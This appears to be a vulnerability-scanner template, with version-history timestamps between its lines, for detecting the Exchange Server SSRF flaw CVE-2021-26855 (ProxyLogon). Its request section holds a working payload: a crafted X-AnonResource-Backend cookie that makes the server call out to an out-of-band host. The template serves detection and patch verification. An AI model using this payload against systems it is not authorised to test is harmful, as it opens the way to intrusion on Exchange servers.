2021-03-06 07:00:59 +00:00
id : CVE-2021-26855
info :
name : Exchange Server SSRF Vulnerability
author : madrobot
severity : critical
description : |
2021-08-19 14:44:46 +00:00
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
2021-08-19 20:44:42 +00:00
tags : cve,cve2021,ssrf,rce,exchange,oob,microsoft
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://proxylogon.com/#timeline
- https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
- https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2021-26855
2021-03-06 07:34:26 +00:00
2021-03-06 07:00:59 +00:00
requests :
- raw :
- |
GET /owa/auth/x.js HTTP/1.1
Host : {{Hostname}}
2021-08-12 15:54:09 +00:00
Cookie : X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;
2021-03-06 07:00:59 +00:00
matchers :
- type : word
2021-08-12 15:54:09 +00:00
part : interactsh_protocol # Confirms the HTTP Interaction
2021-03-06 07:00:59 +00:00
words :
2021-08-12 15:54:09 +00:00
- "http"